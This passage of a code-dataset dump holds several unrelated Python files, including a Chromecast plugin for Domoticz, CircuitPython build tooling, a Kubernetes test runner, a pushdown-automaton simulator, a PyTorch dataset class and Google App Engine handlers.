tif_img_directory + '\\\\' + str(tif_image_list[x])\r\n\r\n tempstr = str(tif_image_list[x])\r\n tempstr = tempstr.replace('tif', 
'jpeg')\r\n jpeg_img_directory = jpeg_img_directory + '\\\\' + tempstr\r\n\r\n slice_name = str(tif_image_list[x])\r\n slice_name = slice_name.replace('.tif', '_slice')\r\n\r\n convert_tif_to_jpeg(tif_img_directory, jpeg_img_directory)\r\n slice_jpeg(jpeg_img_directory, num_slices,\r\n jpeg_slices_directory, slice_name)\r\n\r\n return\r\n\r\n\r\n# Creates a list of all the image file names in morpho_training folder\r\ntif_image_list = os.listdir(\r\n r'G:\\PyScripts\\morpho_training\\test_images\\original')\r\n\r\nprint(\"All images in folder: \", tif_image_list)\r\n\r\n# Variables\r\nnum_slices = 16 # 408x352 pixels, image_slicer automatically slices to possible number so odd number slices and unsliceable numbers get adjusted\r\n# The r makes it a raw string otherwise you need to use double backslashes\r\ntif_img_directory = r'G:\\PyScripts\\morpho_training\\test_images\\original'\r\njpeg_img_directory = r'G:\\PyScripts\\morpho_training\\test_images\\test_jpg'\r\njpeg_slices_directory = r'G:\\PyScripts\\morpho_training\\test_images\\test_slices'\r\n\r\nconvert_tif_to_jpeg_slices(tif_image_list, tif_img_directory,\r\n jpeg_img_directory, jpeg_slices_directory, num_slices)\r\n","sub_path":"tif_image_slicer.py","file_name":"tif_image_slicer.py","file_ext":"py","file_size_in_byte":2460,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"352103926","text":"#\n# Author: Tsjippy\n#\n\"\"\"\n\n \n

Chromecast\n\nThis plugin adds devices to Domoticz to control your chromecast, and to retrieve its current app, title and playing mode.\n\nFeatures:\n- Pause, Play or stop the app on the chromecast\n- See current connected app, title and playing mode.\n\nDevices:\n- Switch device - Playing mode\n- Switch device - Connected app\n- Volume device - See or adjust the current volume\n- Text device - See current title\n\nConfiguration:\nJust add your chromecast name
\n\"\"\"\n#############################################################################\n# Imports #\n#############################################################################\nimport sys\nimport threading\n\ntry:\n import Domoticz\n debug = False\nexcept ImportError:\n import fakeDomoticz as Domoticz\n debug = True\n\nimport pychromecast\nfrom pychromecast.controllers.youtube import YouTubeController\n\n#############################################################################\n# Domoticz call back functions #\n#############################################################################\nclass StatusListener:\n def __init__(self, name, cast):\n self.name = name\n self.cast = cast\n self.Appname=\"\"\n self.Volume=0\n\n def new_cast_status(self, status):\n if self.Appname != status.display_name:\n self.Appname = status.display_name\n Domoticz.Log(\"The app changed to \"+status.display_name)\n UpdateDevice(4,0,str(self.Appname))\n\n if self.Volume != status.volume_level:\n self.Volume = status.volume_level\n Volume = int(self.Volume*100)\n Domoticz.Log(\"Updated volume to \"+str(Volume))\n UpdateDevice(2,Volume,str(Volume))\n\n\nclass StatusMediaListener:\n def __init__(self, name, cast):\n self.name = name\n self.cast= cast\n self.Mode=\"\"\n self.Title=\"\"\n\n def new_media_status(self, status):\n #Domoticz.Log(\"Mediastatus \"+str(status))\n if self.Mode != status.player_state:\n self.Mode = status.player_state\n\n if(self.Mode) == \"PLAYING\":\n self.Mode=\"Play\"\n elif(self.Mode) == \"PAUSED\":\n self.Mode=\"Pause\"\n elif(self.Mode) == \"STOPPED\":\n self.Mode=\"Stop\"\n\n Domoticz.Log(\"The playing mode has changed to \"+self.Mode)\n UpdateDevice(1,0,self.Mode)\n if self.Title != status.title:\n self.Title = status.title\n Domoticz.Log(\"The title is changed to \"+self.Title)\n UpdateDevice(3,0,self.Title)\n\nclass BasePlugin:\n enabled = False\n def __init__(self):\n #self.var = 123\n return\n\n def onStart(self):\n # Check if images are in database\n Domoticz.Status(\"Checking if images are loaded\")\n if 'ChromecastLogo' not in Images: Domoticz.Image('ChromecastLogo.zip').Create()\n\n # Check if devices need to be created\n createDevices()\n\n if Parameters[\"Mode6\"]==\"Debug\":\n DumpConfigToLog()\n\n Domoticz.Heartbeat(30)\n\n Domoticz.Status(\"Starting up\")\n\n self.chromecast=ConnectChromeCast()\n\n if self.chromecast != \"\":\n Domoticz.Status(\"Registering listeners\")\n\n thread = Thread(target = startListening, args = (self.chromecast, ))\n thread.start()\n\n return True\n\n def onHeartbeat(self):\n if self.chromecast == \"\":\n self.chromecast=ConnectChromeCast()\n\n def onCommand(self, Unit, Command, Level, Hue):\n Domoticz.Log(\"onCommand called for Unit \" + str(Unit) + \": Parameter '\" + str(Command) + \"', Level: \" + str(Level))\n if self.chromecast == \"\":\n Domoticz.Error(\"No chromecast is connected!\")\n else:\n if Unit == 1:\n if Level == 10:\n Domoticz.Log(\"Start playing on chromecast\")\n self.chromecast.media_controller.play()\n elif Level == 20:\n Domoticz.Log(\"Pausing chromecast\")\n self.chromecast.media_controller.pause()\n elif Level == 30:\n Domoticz.Log(\"Killing \"+self.chromecast.app_display_name)\n self.chromecast.quit_app()\n elif Unit == 2:\n vl = float(Level)/100\n self.chromecast.set_volume(vl)\n elif Unit == 4:\n if Level == 30:\n Domoticz.Log(\"Starting Youtube on chromecast\")\n yt = YouTubeController()\n self.chromecast.register_handler(yt)\n\nglobal _plugin\n_plugin = BasePlugin()\n\ndef onStart():\n global _plugin\n 
_plugin.onStart()\n\ndef onHeartbeat():\n global _plugin\n _plugin.onHeartbeat()\n\ndef onCommand(Unit, Command, Level, Hue):\n global _plugin\n _plugin.onCommand(Unit, Command, Level, Hue)\n\n # Generic helper functions\ndef DumpConfigToLog():\n for x in Parameters:\n if Parameters[x] != \"\":\n Domoticz.Debug( \"'\" + x + \"':'\" + str(Parameters[x]) + \"'\")\n Domoticz.Debug(\"Device count: \" + str(len(Devices)))\n for x in Devices:\n Domoticz.Debug(\"Device: \" + str(x) + \" - \" + str(Devices[x]))\n Domoticz.Debug(\"Device ID: '\" + str(Devices[x].ID) + \"'\")\n Domoticz.Debug(\"Device Name: '\" + Devices[x].Name + \"'\")\n Domoticz.Debug(\"Device nValue: \" + str(Devices[x].nValue))\n Domoticz.Debug(\"Device sValue: '\" + Devices[x].sValue + \"'\")\n Domoticz.Debug(\"Device LastLevel: \" + str(Devices[x].LastLevel))\n return\n\n#############################################################################\n# Device specific functions #\n#############################################################################\n\ndef senderror(e):\n Domoticz.Error('Error on line {}'.format(sys.exc_info()[-1].tb_lineno)+\" Error is \"+str(e))\n return\n\ndef createDevices():\n if 1 not in Devices:\n OPTIONS1 = { \"LevelActions\" : \"|||||\",\n \"LevelNames\" : \"Off|Play|Pause|Stop\",\n \"LevelOffHidden\": \"true\",\n \"SelectorStyle\" : \"0\"\n }\n Domoticz.Log(\"Created 'Status' device\")\n Domoticz.Device(Name=\"Control\", Unit=1, TypeName=\"Selector Switch\", Switchtype=18, Options=OPTIONS1, Used=1).Create()\n UpdateImage(1, 'ChromecastLogo')\n\n if 2 not in Devices:\n Domoticz.Log(\"Created 'Volume' device\")\n Domoticz.Device(Name=\"Volume\", Unit=2, Type=244, Subtype=73, Switchtype=7, Used=1).Create()\n UpdateImage(2, 'ChromecastLogo')\n\n if 3 not in Devices:\n Domoticz.Log(\"Created 'Title' device\")\n Domoticz.Device(Name=\"Title\", Unit=3, Type=243, Subtype=19, Used=1).Create()\n UpdateImage(3, 'ChromecastLogo')\n\n if 4 not in Devices:\n OPTIONS4 = { \"LevelActions\" : \"|||||\",\n \"LevelNames\" : \"Off|Spotify|Netflix|Youtube|Other\",\n \"LevelOffHidden\": \"true\",\n \"SelectorStyle\" : \"0\"\n }\n Domoticz.Log(\"Created 'App' device\")\n Domoticz.Device(Name=\"App name\", Unit=4, TypeName=\"Selector Switch\", Switchtype=18, Options=OPTIONS4, Used=1).Create()\n UpdateImage(4, 'ChromecastLogo')\n\n Domoticz.Log(\"Devices check done\")\n return\n\n# Synchronise images to match parameter in hardware page\ndef UpdateImage(Unit, Logo):\n if Unit in Devices and Logo in Images:\n if Devices[Unit].Image != Images[Logo].ID:\n Domoticz.Log(\"Device Image update: 'Chromecast', Currently \" + str(Devices[Unit].Image) + \", should be \" + str(Images[Logo].ID))\n Devices[Unit].Update(nValue=Devices[Unit].nValue, sValue=str(Devices[Unit].sValue), Image=Images[Logo].ID)\n return\n\ndef ConnectChromeCast():\n chromecast = \"\"\n try:\n ChromecastName = Parameters[\"Mode1\"]\n except:\n ChromecastName=\"Test Device\"\n\n Domoticz.Status(\"Checking for available chromecasts\")\n try:\n chromecasts = pychromecast.get_chromecasts()\n if len(chromecasts) != 0:\n Domoticz.Log(\"Found these chromecasts: \"+str(chromecasts))\n else:\n Domoticz.Status(\"No casting devices found, make sure they are online.\")\n except Exception as e:\n senderror(e)\n\n if len(chromecasts) != 0:\n Domoticz.Status(\"Trying to connect to \"+ChromecastName)\n try:\n chromecast = next(cc for cc in chromecasts if cc.device.friendly_name == ChromecastName)\n Domoticz.Status(\"Connected to \" + ChromecastName)\n except 
StopIteration:\n Domoticz.Error(\"Could not connect to \"+ChromecastName)\n except Exception as e:\n senderror(e)\n\n return chromecast\n\ndef startListening(chromecast):\n Domoticz.Log(\"Registering listeners\")\n listenerCast = StatusListener(chromecast.name, chromecast)\n chromecast.register_status_listener(listenerCast)\n\n listenerMedia = StatusMediaListener(chromecast.name, chromecast)\n chromecast.media_controller.register_status_listener(listenerMedia)\n\n Domoticz.Log(\"Done registering listeners\")\n\n# Update Device into database\ndef UpdateDevice(Unit, nValue, sValue, AlwaysUpdate=False):\n # Make sure that the Domoticz device still exists (they can be deleted) before updating it\n if Unit in Devices:\n if Devices[Unit].nValue != nValue or Devices[Unit].sValue != sValue or AlwaysUpdate == True:\n Devices[Unit].Update(nValue, str(sValue))\n Domoticz.Log(\"Update \" + Devices[Unit].Name + \": \" + str(nValue) + \" - '\" + str(sValue) + \"'\")\n return\n\nif debug==True:\n ConnectChromeCast()\n\n\n\n\n","sub_path":"plugin.py","file_name":"plugin.py","file_ext":"py","file_size_in_byte":10819,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"507758576","text":"def max_number(list1):\n counter=0\n max1=list1[0]\n while countermax1:\n max1=list1[counter]\n counter=counter+1\n return max1\ndef two_list(list1,list2):\n value=list1+list2\n call_function=max_number(value)\n return (call_function)\ndef odd_even(list):\n list=[1,2,3,4,5,6,7,8,9,10,12,13,14,15,16,17,18,19,99,234,20]\n list1=[]\n list2=[]\n index=0\n while index 1:\n output_directory = os.path.join(output_directory, library)\n os.makedirs(output_directory)\n package_init = os.path.join(output_directory, \"__init__.py\")\n # Touch the __init__ file.\n with open(package_init, 'a'):\n pass\n\n if len(package_files) > 1:\n for fn in package_files:\n base_dir = os.path.join(output_directory, os.path.dirname(fn))\n if not os.path.isdir(base_dir):\n os.makedirs(base_dir)\n total_size += 512\n\n\n new_extension = \".py\"\n if mpy_cross:\n new_extension = \".mpy\"\n\n for filename in py_files:\n full_path = os.path.join(library_path, filename)\n output_file = os.path.join(output_directory,\n filename.replace(\".py\", new_extension))\n if mpy_cross:\n\n mpy_success = subprocess.call([mpy_cross,\n \"-o\", output_file,\n \"-s\", filename,\n full_path])\n if mpy_success != 0:\n raise RuntimeError(\"mpy-cross failed on\", full_path)\n else:\n shutil.copyfile(full_path, output_file)\n\n for filename in package_files:\n full_path = os.path.join(library_path, filename)\n if (not mpy_cross or\n os.stat(full_path).st_size == 0 or\n filename.endswith(\"__init__.py\")):\n output_file = os.path.join(output_directory, filename)\n shutil.copyfile(full_path, output_file)\n else:\n output_file = os.path.join(output_directory,\n filename.replace(\".py\", new_extension))\n mpy_success = subprocess.call([mpy_cross,\n \"-o\", output_file,\n \"-s\", filename,\n full_path])\n if mpy_success != 0:\n raise RuntimeError(\"mpy-cross failed on\", full_path)\n","sub_path":"circuitpython_build_tools/build.py","file_name":"build.py","file_ext":"py","file_size_in_byte":5043,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"596603947","text":"from ApiADA.loggers import logging\nfrom core.exceptions.customexceptions import ApiException\nimport traceback\nimport json\nfrom core.vodafone.smart.contract.models import Contract\nfrom django.conf import 
settings\nfrom core.vodafone.smart import smart_query\n\n\nlog = logging.getLogger(__name__)\n\nclass AveriasManagement:\n\n def AddComment(params):\n\n log.info('Start: AddComment')\n\n if not \"s_id_averia\" in params:\n raise ApiException(\"Invalid params. s_id_averia required.\")\n if not \"s_user\" in params:\n raise ApiException(\"Invalid params. s_user required.\")\n\n try:\n \n paramsProc=[\n {\n \"name\": \"id_averia\",\n \"inout\": \"IN\",\n \"type\": \"String\",\n \"value\": params[\"s_id_averia\"]\n },\n {\n \"name\": \"usuario\",\n \"inout\": \"IN\",\n \"type\": \"String\",\n \"value\": params[\"s_user\"]\n },\n {\n \"name\": \"comentario\",\n \"inout\": \"IN\",\n \"type\": \"String\",\n \"value\": params[\"s_comentario\"]\n },\n {\n \"name\": \"id_incidencia\",\n \"inout\": \"IN\",\n \"type\": \"String\",\n \"value\": params[\"s_id_incidencia\"]\n },\n {\n \"name\": \"resultado\",\n \"inout\": \"OUT\",\n \"type\": \"String\"\n },\n {\n \"name\": \"res_desc\",\n \"inout\": \"OUT\",\n \"type\": \"String\"\n }\n ] \n\n output=smart_query.execProcedure(\"smart_replica\", \"SA.PKG_GESTION_AVERIAS_ADA.PRC_ADD_COMENTARIO_AVERIA\", paramsProc)\n\n except Exception as e:\n log.error('Exception:'+type(e).__name__ +\" \" +str(e))\n log.error(traceback.format_exc())\n raise ApiException(str(e))\n\n log.info('End: AddComment')\n\n return output\n\n\n def MoveAveria(params):\n\n log.info('Start: MoveAveria')\n\n if not \"s_id_averia\" in params:\n raise ApiException(\"Invalid params. s_id_averia required.\")\n if not \"s_queue\" in params:\n raise ApiException(\"Invalid params. s_queue required.\")\n\n try:\n \n paramsProc=[\n {\n \"name\": \"id_averia\",\n \"inout\": \"IN\",\n \"type\": \"String\",\n \"value\": params[\"s_id_averia\"]\n },\n {\n \"name\": \"cola_destino\",\n \"inout\": \"IN\",\n \"type\": \"Number\",\n \"value\": params[\"s_queue\"]\n },\n {\n \"name\": \"resultado\",\n \"inout\": \"OUT\",\n \"type\": \"String\"\n },\n {\n \"name\": \"res_desc\",\n \"inout\": \"OUT\",\n \"type\": \"String\"\n }\n ] \n\n output=smart_query.execProcedure(\"smart_replica\", \"SA.PKG_GESTION_AVERIAS_ADA.PRC_MOVER_AVERIA_A_NUEVA_COLA\", paramsProc)\n\n except Exception as e:\n log.error('Exception:'+type(e).__name__ +\" \" +str(e))\n log.error(traceback.format_exc())\n raise ApiException(str(e))\n\n log.info('End: MoveAveria')\n\n return output\n\n\n def CloseAveria(params):\n\n log.info('Start: CloseAveria')\n\n if not \"s_id_averia\" in params:\n raise ApiException(\"Invalid params. s_id_averia required.\")\n if not \"s_notes\" in params:\n raise ApiException(\"Invalid params. 
s_notes required.\")\n\n try:\n \n paramsProc=[\n {\n \"name\": \"id_averia\",\n \"inout\": \"IN\",\n \"type\": \"String\",\n \"value\": params[\"s_id_averia\"]\n },\n {\n \"name\": \"strnotas\",\n \"inout\": \"IN\",\n \"type\": \"String\",\n \"value\": params[\"s_notes\"]\n },\n {\n \"name\": \"resultado\",\n \"inout\": \"OUT\",\n \"type\": \"String\"\n },\n {\n \"name\": \"res_desc\",\n \"inout\": \"OUT\",\n \"type\": \"String\"\n }\n ] \n\n output=smart_query.execProcedure(\"smart_replica\", \"SA.PKG_GESTION_AVERIAS_ADA.PRC_CERRAR_AVERIA\", paramsProc)\n\n except Exception as e:\n log.error('Exception:'+type(e).__name__ +\" \" +str(e))\n log.error(traceback.format_exc())\n raise ApiException(str(e))\n\n log.info('End: CloseAveria')\n\n return output","sub_path":"core/beans/averias_management/averias_management.py","file_name":"averias_management.py","file_ext":"py","file_size_in_byte":5139,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"276282783","text":"import yaml\nimport os, sys, subprocess\nimport time, random, string\nfrom kubernetes import client, config\n\nMPATH = \"manifests\"\nCFILE = \"test.yaml\"\n\napi = None\n\ndef rand_str(length=5):\n letters = string.ascii_lowercase\n return ''.join(random.choice(letters) for i in range(length))\n\ndef loop(step):\n for i in range(step[\"Count\"]):\n print(\"iteration\", str(i))\n run_test(step)\n print(\"end of iteration\")\n\ndef deploy_manifest(step):\n manifest = step[\"Manifest\"]\n ns = step[\"Namespace\"]\n\n path = os.path.join(MPATH, manifest)\n\n if \"ManifestName\" in step:\n o = yaml.safe_load(open(path, \"r\"))\n o[\"metadata\"][\"name\"] = \"test-\" + rand_str() \\\n if step[\"ManifestName\"] == \"Generate\" else step[\"ManifestName\"]\n\n path = \"/tmp/test\" + o[\"metadata\"][\"name\"] \n\n with open(path, \"w+\") as f:\n yaml.safe_dump(o, f)\n\n e = subprocess.run([\"kubectl\", \"apply\", \"-n\", ns, \"-f\", path],\n stdout=subprocess.DEVNULL)\n \n if e.returncode != 0:\n print(\"Error applying manifest\")\n sys.exit(1)\n\ndef delete(step):\n ns = step['Namespace']\n\n e = subprocess.run([\"kubectl\", \"delete\", \"ns\", ns])\n \n if e.returncode != 0:\n print(\"Error scaling deployment\")\n sys.exit(1)\n\n\ndef scale_deployment(step):\n ns = step['Namespace']\n nm = step['DeploymentName']\n rp = step['Replicas']\n\n e = subprocess.run([\"kubectl\", \"scale\", \"deployment\", nm, \n \"--replicas=\" + str(rp), \"-n\", ns])\n \n if e.returncode != 0:\n print(\"Error scaling deployment\")\n sys.exit(1)\n\ndef wait_for_all_deployments_completion(step):\n ns = \"default\"\n if \"Namespace\" in step:\n ns = step[\"Namespace\"]\n \n while True:\n r = api.list_namespaced_deployment(namespace=ns, watch=False)\n \n count = 0\n for d in r.items:\n ready = d.status.ready_replicas\n replicas = d.status.replicas\n\n if ready == replicas:\n count = count + 1\n \n if count == len(r.items):\n return\n\n print(\"Waiting for all deployments to become ready %d/%d ...\" % \n (count, len(r.items)))\n time.sleep(1)\n\ndef parse_config():\n with open(CFILE, \"r\") as f:\n o = yaml.load(f)\n return o\n\n\nswitch = {\n \"Loop\": loop,\n \"Deploy\": deploy_manifest,\n \"ScaleDeployment\": scale_deployment,\n \"WaitForAllDeploymentsCompletion\": wait_for_all_deployments_completion\n }\n\n\ndef run_test(test):\n for step in test[\"Steps\"]:\n func = switch[step[\"Name\"]]\n print(\"Running\", step['Name'])\n func(step)\n\ndef main():\n config.load_kube_config()\n global api\n api = 
client.AppsV1Api()\n\n test = parse_config()\n run_test(test)\n\nmain()\n","sub_path":"trun/trun.py","file_name":"trun.py","file_ext":"py","file_size_in_byte":2815,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"30545777","text":"#!/bin/python3\n\nimport sys\nimport copy\n\ndef winningHands(m, x, a):\n best_so_far = [0] * (m + 5)\n current = [0] * (m + 5)\n for card in a:\n # loop invariant: current[j] is the number of ways that \n # some product of numbers (processed beforehand) mod m = j \n # for all cards until and including the current card\n for j in range(len(current)):\n # we increment the number of ways in which we can reach j * card\n # with the number of ways we already reached j\n current[(j * card) % m] += best_so_far[j]\n # the current card alone accounts for 1 way to reach card % m\n current[card % m] += 1\n # update the best results thus far\n best_so_far = copy.copy(current)\n # return the highest number of ways to reach x\n return best_so_far[x]\n\n \n\nif __name__ == \"__main__\":\n n, m, x = input().strip().split(' ')\n n, m, x = [int(n), int(m), int(x)]\n a = list(map(int, input().strip().split(' ')))\n a = [a[i] for i in range(n)]\n result = winningHands(m, x, a)\n print(result)\n\n","sub_path":"hackerrank/rookierank4/WinningHands.py","file_name":"WinningHands.py","file_ext":"py","file_size_in_byte":1082,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"414377214","text":"import re, sys\n\ndef readFile():\n\tfile = open(sys.argv[1], \"r\")\n\tautomato = []\n\n\tfor line in file:\n\t\tautomato.append(line)\n\n\tfile.close()\n\n\treturn automato\n\ndef clearFirstLine(automato):\n\tfirstLine = automato[0]\n\tregex = re.compile(r'\\{[^\\}]*\\}')\n\tdata = re.findall(regex, firstLine)\n\tresult = []\n\n\tfor element in data:\n\t\tresult.append(element.strip(\"{}\").replace(\" \", \"\").split(\",\"))\n\n\treturn result\n\ndef searchInitialState(automato):\n\tfirstLine = automato[0]\n\tregex = re.compile(r\"Z|,\\sq\\w*,\\s{\")\n\tdata = re.findall(regex, firstLine)\n\tinitialState = [element.strip(\",{ \") for element in data]\n\n\treturn initialState\n\ndef readTransictionRules(automato):\n\trules = []\n\n\tfor i in range(1, len(automato)):\n\t\tautomato[i] = automato[i].strip(\"\\n\").replace(\" \", \"\").split(\",\")\n\t\trules.append(automato[i])\n\n\treturn rules\n\ndef printing(state, letter, rStack, nextState, wStack, stack):\n\tif wStack != \"_\":\n\t\tif len(wStack)>1:\n\t\t\tfor c in wStack:\n\t\t\t\tstack.append(c)\n\t\telse:\n\t\t\tstack.append(wStack)\n\t\t\t\n\tprint(\"(\" + state + \", \" + letter +\", \"+ rStack + \") = (\"+ nextState +\", \"+ wStack+ \") - Pilha = {}\".format(stack))\n\n\treturn (True, nextState)\n\n\ndef test(stack, rStack, letter):\n\tif (len(stack) == 0) and (rStack == \"?\") and (letter == \" \"):\n\t\treturn True\n\treturn False\n\ndef readingOfWord(initialState, finalStates, rules, auxPilha):\n\tword = sys.argv[2]\n\tword += \" \"\n\tactualState = initialState[0]\n\tstack = []\n\n\t\n\tfor letter in word:\n\t\tvalidation = False\n\n\t\tfor rule in rules:\n\t\t\tstate, symbol, rStack, nextState, wStack = rule\n\t\t\tif (state == actualState) and ((symbol == letter) or (symbol == \"?\")):\t\t\t\t\n\t\t\t\t#print(regra)\n\t\t\t\tif test(stack, rStack, letter):\n\t\t\t\t\tvalidation, actualState = printing(state, letter, rStack, nextState, wStack, stack)\n\t\t\t\t\tbreak\n\n\t\t\t\telif rStack == \"_\":\n\t\t\t\t\tvalidation, 
actualState = printing(state, letter, rStack, nextState, wStack, stack)\n\t\t\t\t\tbreak\n\n\t\t\t\telif (len(stack) > 0) and (rStack == stack[-1]):\n\t\t\t\t\tstack.pop()\n\t\t\t\t\tvalidation, actualState = printing(state, letter, rStack, nextState, wStack, stack)\n\t\t\t\t\tbreak\n\n\t\tif not validation:\n\t\t\treturn False\n\n\tif actualState in finalStates:\n\t\treturn True\n\telse:\n\t\treturn False\n\n\ndef main():\n\tautomato = readFile()\n\tdata = clearFirstLine(automato)\n\tinitialState = searchInitialState(automato)\n\trules = readTransictionRules(automato)\n\talphabet = data[0]\n\tstates = data[1]\n\tfinalStates = data[2]\n\tauxPilha = data[3]\n\n\tprint(\"\\n-> Alfabeto: {}\".format(alphabet))\n\tprint(\"-> Estados: {}\".format(states))\n\tprint(\"-> Estado Inicial: {}\".format(initialState))\n\tprint(\"-> Estado Final: {}\".format(finalStates))\n\tprint(\"-> Alfabeto Pilha : {}\".format(auxPilha))\n\tprint(\"-> Regras de Transição: \")\n\n\tfor rule in rules:\n\t\tprint(rule)\n\tprint()\n\n\tprint(\"Processamento: \"+ sys.argv[2])\n\t\n\tvalidation = readingOfWord(initialState, finalStates, rules, auxPilha)\n\n\tif validation == True:\n\t\treturn (\"\\nPalavra Valida\")\n\telse:\n\t\treturn (\"\\nPalavra Invalida\")\n\n\nif len(sys.argv) != 3:\n\tprint(\"Você precisa informar um arquivo e uma palavra para ser processada\")\nelse:\n\tprint(main())\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3042,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"511297190","text":"# Copyright [yyyy] [name of copyright owner]\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n# \n# http://www.apache.org/licenses/LICENSE-2.0\n# \n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport torch.utils.data as data\nimport os\nfrom PIL import Image\nimport numpy as np\nimport pickle\nimport copy\n\nclass AttDataset(data.Dataset):\n \"\"\"\n person attribute dataset interface\n \"\"\"\n def __init__(\n self, \n dataset,\n partition,\n split='train',\n partition_idx=0,\n transform=None,\n target_transform=None,\n **kwargs):\n if os.path.exists( dataset ):\n file = open(dataset, 'rb')\n self.dataset = pickle.load(file)\n else:\n print (dataset + ' does not exist in dataset.')\n raise ValueError\n if os.path.exists( partition ):\n part = open(partition, 'rb')\n self.partition = pickle.load(part)\n else:\n print (partition + ' does not exist in dataset.')\n raise ValueError\n if split not in self.partition:\n print (split + ' does not exist in dataset.')\n raise ValueError\n \n if partition_idx > len(self.partition[split])-1:\n print ('partition_idx is out of range in partition.')\n raise ValueError\n\n self.transform = transform\n self.target_transform = target_transform\n\n # create image, label based on the selected partition and dataset split\n self.root_path = self.dataset['root']\n self.att_name = [self.dataset['att_name'][i] for i in self.dataset['selected_attribute']]\n self.image = []\n self.label = []\n for idx in self.partition[split][partition_idx]:\n self.image.append(self.dataset['image'][idx])\n 
label_tmp = np.array(self.dataset['att'][idx])[self.dataset['selected_attribute']].tolist()\n self.label.append(label_tmp)\n\n def __getitem__(self, index):\n \"\"\"\n Args:\n index (int): Index\n Returns:\n tuple: (image, target) where target is the index of the target class\n \"\"\"\n imgname, target = self.image[index], self.label[index]\n # load image and labels\n imgname = os.path.join(self.dataset['root'], imgname)\n img = Image.open(imgname)\n if self.transform is not None:\n img = self.transform( img )\n \n # default no transform\n target = np.array(target).astype(np.float32)\n target[target == 0] = -1\n target[target == 2] = 0\n if self.target_transform is not None:\n target = self.transform( target )\n\n return img, target\n\n # useless for personal batch sampler\n def __len__(self):\n return len(self.image)\n\n\n","sub_path":"PyTorch/built-in/cv/classification/DeepMar_for_PyTorch/baseline/dataset/Dataset.py","file_name":"Dataset.py","file_ext":"py","file_size_in_byte":3194,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"146602260","text":"import cgi\nimport os\nfrom django.utils import simplejson as json\nimport oauth\nimport hashlib\n\nfrom collections import deque\n\nimport re\nimport datetime\n\nimport logging\n\nimport gmemsess\n\nfrom google.appengine.api import urlfetch\n\nfrom google.appengine.ext import webapp\nfrom google.appengine.ext.webapp import util\nfrom google.appengine.ext.webapp.util import run_wsgi_app\nfrom google.appengine.ext import db\n#from google.appengine.ext.db import stats\nfrom google.appengine.ext.webapp import template\nfrom google.appengine.api import memcache\nfrom google.appengine.api import images\nfrom google.appengine.api import quota\n\nimport cStringIO\nimport csv\n\nfrom datastore import *\nimport helper\nimport phone\n\n# number of observations shown per page\nPAGE_SIZE = 20\n\n# map page: /map\nclass MapPage(webapp.RequestHandler):\n\tdef get(self):\n\t\tif os.environ.get('HTTP_HOST'):\n\t\t\tbase_url = 'http://' + os.environ['HTTP_HOST'] + '/'\n\t\telse:\n\t\t\tbase_url = 'http://' + os.environ['SERVER_NAME'] + '/'\n\n\t\textracted = memcache.get('saved')\n\n\t\tif not extracted:\n\t\t\tsurveys = SurveyData.all().order('-timestamp').fetch(PAGE_SIZE*5+1)\n\t\t\textracted = helper.extract_surveys (surveys)\n\t\t\tif surveys is not None:\n\t\t\t\t#memcache.set('saved', extracted, 604800)\n\t\t\t\tmemcache.set('saved', extracted)\n\t\ttemplate_values = { 'surveys' : extracted, 'base_url' : base_url }\n\t\ttemplate_values['map'] = True\n\t\tpath = os.path.join (os.path.dirname(__file__), 'views/map.html')\n\t\tself.response.out.write (helper.render(self, path, template_values))\n\t# end get method\n# End MapPage Class\n\n# handler for: /get_point_summary\nclass GetPointSummary(webapp.RequestHandler):\n\t# returns json string of all survey data\n\t# TODO: this needs to be changed to return only a subset of the surveys, add paging\n\tdef get(self):\n\t\t#surveys = db.GqlQuery(\"SELECT * FROM SurveyData ORDER BY timestamp DESC LIMIT 50\")\n\n\t\t# this should be changed to just use the same extracted format everything else uses...\n\t\td = memcache.get('pointsummary')\n\n\t\ti = 0\n\t\tif not d:\n\t\t\tsurveys = SurveyData.all().order('-timestamp').fetch(50)\n\t\t\td = {}\n\t\t\tfor s in surveys:\n\t\t\t\te = {}\n\t\t\t\te['latitude'] = s.latitude\n\t\t\t\te['longitude'] = s.longitude\n\t\t\t\te['stressval'] = s.stressval\n\t\t\t\te['comments'] = s.comments\n\t\t\t\te['key'] = 
str(s.key())\n\t\t\t\te['version'] = s.version\n\t\t\t\tif s.hasphoto:\n\t\t\t\t\te['photo_key'] = str(s.photo_ref.key())\n\t\t\t\telse:\n\t\t\t\t\te['photo_key'] = None\n\n\t\t\t\td[i] = e\n\t\t\t\ti = i + 1\n\n\t\t\tif i > 0:\n\t\t\t\t#memcache.set('pointsummary', d, 604800)\n\t\t\t\tmemcache.set('pointsummary', d)\n\t\telse:\n\t\t\ti = len(d)\n\n\t\tself.response.headers['Content-type'] = 'text/plain'\n\t\tif i > 0 :\n\t\t\tself.response.out.write(json.dumps(d))\n\t\telse:\n\t\t\tself.response.out.write(\"no data so far\")\n\t# end get method\n# End GetPointSummary Class\n\n# handler for: /get_a_point\nclass GetAPoint(webapp.RequestHandler):\n\t# input: key - datastore key from SurveyData \n\t# returns survey data associated with given key as json string\n\tdef get(self):\n\t\tif os.environ.get('HTTP_HOST'):\n\t\t\tbase_url = os.environ['HTTP_HOST']\n\t\telse:\n\t\t\tbase_url = os.environ['SERVER_NAME']\n\n\n\t\tself.response.headers['Content-type'] = 'text/plain'\n\t\treq_key = self.request.get('key')\n\t\tif req_key != '':\n\t\t\ttry :\n\t\t\t\tdb_key = db.Key(req_key)\n\t\t\t\ts = db.GqlQuery(\"SELECT * FROM SurveyData WHERE __key__ = :1\", 